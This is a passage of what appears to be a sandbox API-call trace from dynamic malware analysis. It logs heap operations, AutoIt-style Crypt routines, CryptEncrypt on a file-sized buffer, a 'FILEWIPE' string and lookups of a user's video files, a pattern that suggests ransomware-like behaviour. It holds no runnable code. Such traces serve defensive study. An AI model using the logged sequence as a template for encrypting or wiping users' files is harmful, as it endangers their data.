dwFlags=0x0, lpMem=0x9ba018 | out: hHeap=0x8a0000) returned 1 [0199.615] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28c8 | out: hHeap=0x8a0000) returned 1 [0199.615] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4f8 | out: hHeap=0x8a0000) returned 1 [0199.615] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0199.615] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd750 | out: hHeap=0x8a0000) returned 1 [0199.615] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0199.615] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0199.615] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df190 | out: hHeap=0x8a0000) returned 1 [0199.615] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0199.615] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df190 [0199.615] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0199.615] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28c8 [0199.615] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3f0 [0199.616] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd750 [0199.616] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0199.616] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd750 | out: hHeap=0x8a0000) returned 1 [0199.616] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee20 [0199.616] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd750 [0199.616] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27f8 [0199.616] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2828 [0199.616] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0199.616] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0199.616] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0199.616] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0199.616] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba018 [0199.616] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db408 [0199.616] PeekMessageW (in: lpMsg=0x87e2d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e2d4) returned 0 [0199.616] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2828 [0199.616] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0199.616] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0199.616] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0199.616] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db408 | out: hHeap=0x8a0000) returned 1 [0199.616] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba018 | out: hHeap=0x8a0000) returned 1 [0199.616] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0199.616] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba018 [0199.616] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27f8 [0199.616] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0199.616] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0199.616] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0199.616] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27f8 [0199.616] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0199.617] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0199.617] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4e0 [0199.617] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27f8 [0199.617] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0199.617] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0199.617] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd918 [0199.617] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27f8 [0199.617] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0199.617] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd510 [0199.617] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27f8 [0199.617] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd798 [0199.617] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0199.617] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f58 [0199.617] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27f8 [0199.617] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0199.617] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7c8 [0199.617] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27f8 [0199.617] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba408 [0199.617] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0199.617] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db408 [0199.617] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee20 | out: hHeap=0x8a0000) returned 1 [0199.617] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9d8 [0199.617] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27f8 [0199.617] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee20 [0199.617] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba078 [0199.617] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2828 [0199.617] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d440 [0199.617] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4f8 [0199.617] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd990 [0199.617] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2818 [0199.618] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0199.618] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2878 [0199.618] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0199.618] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0199.618] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2828 [0199.618] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0199.618] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0199.618] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0199.618] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0199.618] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0199.618] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4f8 | out: hHeap=0x8a0000) returned 1 [0199.618] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0199.618] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0199.618] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0199.618] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee20 | out: hHeap=0x8a0000) returned 1 [0199.618] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0199.618] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0199.618] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27f8 [0199.618] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba078 [0199.618] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0199.618] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd990 [0199.618] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27f8 [0199.618] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee20 [0199.618] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0199.618] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0199.618] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d440 [0199.618] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4f8 [0199.618] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0199.618] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2878 [0199.619] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba330 [0199.619] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2828 [0199.619] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0199.619] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0199.619] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0199.619] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0199.619] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba330 | out: hHeap=0x8a0000) returned 1 [0199.619] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0199.619] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0199.619] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0199.619] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4f8 | out: hHeap=0x8a0000) returned 1 [0199.619] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0199.619] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0199.619] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0199.619] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee20 | out: hHeap=0x8a0000) returned 1 [0199.619] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0199.619] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0199.619] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27f8 [0199.619] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0199.619] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0199.619] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0199.619] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27f8 [0199.619] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0199.619] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27f8 [0199.619] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba330 [0199.619] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0199.619] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0199.619] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2878 [0199.620] CryptGetKeyParam (in: hKey=0x90af98, dwParam=0x7, pbData=0x9c2758, pdwDataLen=0x87e2f0, dwFlags=0x0 | out: pbData=0x9c2758*=0x660e, pdwDataLen=0x87e2f0*=0x4) returned 1 [0199.620] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0199.620] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0199.620] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0199.620] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0199.620] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0199.620] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0199.620] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b018 | out: hHeap=0x8a0000) returned 1 [0199.620] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0199.620] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0199.620] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0199.620] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def60 | out: hHeap=0x8a0000) returned 1 [0199.620] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0199.620] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0199.620] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0199.620] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0199.621] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0199.621] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0199.621] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0199.621] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b018 | out: hHeap=0x8a0000) returned 1 [0199.621] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0199.621] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0199.621] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0199.621] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0199.621] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0199.621] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0199.621] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db408 | out: hHeap=0x8a0000) returned 1 [0199.621] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0199.621] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0199.621] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0199.621] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28c8 | out: hHeap=0x8a0000) returned 1 [0199.621] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0199.621] CryptEncrypt (in: hKey=0x90af98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x87e820*=0x4606, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x87e820*=0x4610) returned 1 [0199.621] CharLowerBuffW (in: lpsz="byte[17937]", cchLength=0xb | out: lpsz="byte[17937]") returned 0xb [0199.622] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0199.622] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0199.622] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0199.622] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0199.622] CryptEncrypt (in: hKey=0x90af98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xbf2c38*, pdwDataLen=0x87e820*=0x4606, dwBufLen=0x4610 | out: pbData=0xbf2c38*, pdwDataLen=0x87e820*=0x4610) returned 1 [0199.622] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0199.622] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8defb0 | out: hHeap=0x8a0000) returned 1 [0199.622] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0199.622] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0199.622] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0199.622] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0199.622] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0199.622] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0199.622] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0199.624] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0199.624] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0199.624] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0199.624] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0199.624] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0199.624] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0199.624] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0199.624] CryptDestroyKey (hKey=0x90af98) returned 1 [0199.624] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0199.624] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee20 | out: hHeap=0x8a0000) returned 1 [0199.624] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0199.624] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0199.624] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0199.624] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0199.624] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0199.624] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0199.625] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0199.625] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0199.625] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def10 | out: hHeap=0x8a0000) returned 1 [0199.625] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0199.625] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0199.625] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0199.625] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0199.625] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0199.625] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0199.625] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0199.625] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0199.625] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0199.625] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0199.625] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0199.625] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8debc8 | out: hHeap=0x8a0000) returned 1 [0199.625] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0199.625] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0199.625] CryptReleaseContext (hProv=0x9c0c88, dwFlags=0x0) returned 1 [0199.625] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0199.625] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0199.625] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0199.625] FreeLibrary (hLibModule=0x74f20000) returned 1 [0199.625] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0199.625] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def10 | out: hHeap=0x8a0000) returned 1 [0199.628] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0199.628] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deb78 | out: hHeap=0x8a0000) returned 1 [0199.628] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0199.629] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\J9c7.avi", lpFindFileData=0x87eda0 | out: lpFindFileData=0x87eda0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9f0b07b0, ftCreationTime.dwHighDateTime=0x1d5e4c8, ftLastAccessTime.dwLowDateTime=0x6c66c1b0, 